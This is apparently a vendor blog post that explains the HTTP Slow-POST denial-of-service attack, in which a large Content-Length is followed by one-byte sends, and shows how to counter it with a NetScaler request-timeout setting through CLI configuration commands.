The previous blog post ( covers Slow-header attack and continuing on same line, this one covers the Slow-post attack.  All these belong to new class of attacks which circumvents the inherent protection offered in networking gears. Also these attacks use common form of HTTP Method used in most of applications thus causing resource consumption in the server. The attack was carefully crafted which affects many networking gears doing http processing. The impact is greater on HTTP proxies which try to simulate HTTP stack while managing end to end request response flow.

The difference between Slow header and Slow post is that in case of Slow Header, the attack works with partial header where as Slow Post attack sends full header in Http Request but sends partial data. For a web application waiting to accept all the POST data before processing the data is the right thing to do, isn’t it? Slow-Post attack works by partial posting of data to the server and keeping the connection always alive. This attack takes advantage of HTTP Method POST and simply sends partial data at regular time intervals to keep the connection alive. Let’s take a close look at this attack.

Attacker sends a HTTP Post Request with large Content-Length Header value. This makes the server or proxies to believe that the client is going to send so much of data as specified in the Header. The Server keeps the connection open to receive Content-length worth of data. But the attack client sends one byte of POST data at regular time interval configured by the attacker such that connection remains alive. Due to this client idle timeout will not be triggered and Server keeps the connection alive till all the bytes of data specified in Content-Length header were received by the server.

The below packet trace explains how the attack works?


Here the packet number 4 points out an Http POST request with Content-Length set to 1000000. This makes the Server ready to receive this much amount of data from Client.  In packet number 8 the client sends one byte of Post data to the server. Similarly in packet 10 and 12 with 10 seconds difference, the client sends one byte of data.

In NetScaler, the “Show connectiontable” command lists out all connections and “stat lb vserver <vservername>” gives the currently established client connections. The below screenshot was taken during 10 such attack connections in order to give full output here.

The protection against this attack is to have ability to track these attack patterns and drop such connections so that it does not impact the valid traffic flow.

NetScaler has inbuilt protection against this attack. The request timeout parameter need to be configured in NetScaler to protect against this attack. Any transaction which is not complete during the time interval will be dropped and the client is considered as bad client. All these can be tracked through the counter http_err_req_timeout provided by NetScaler.

Once the Zombie connections are cleaned up, we can verify them through “Show connectiontable” command that the connections are actually cleaned up. We can also check the current client connections through “stat lb vserver <vservername>” as shown below,

NetScaler acts as good defence to protect the back end servers against this attack and only Customers need to set their timeout values to appropriate one which suits their application traffic. The Request time out parameter can be set in Http Profile as shown below,

> set httpprofile nshttp_default_profile –reqTimeout <value>

The above example sets the request timeout parameter in default http profile but NetScaler provides options to create your own Http profile based on your traffic pattern. You can set this request timeout parameter in your custom default profile and bind it to the Vserver which is under attack as shown below,

> add httpprofile <profile name> -reqTimeout <value>

set lb vserver <vservername> -httpProfileName <httpprofilename>

Enjoy the built-in NetScaler protection mechanisms.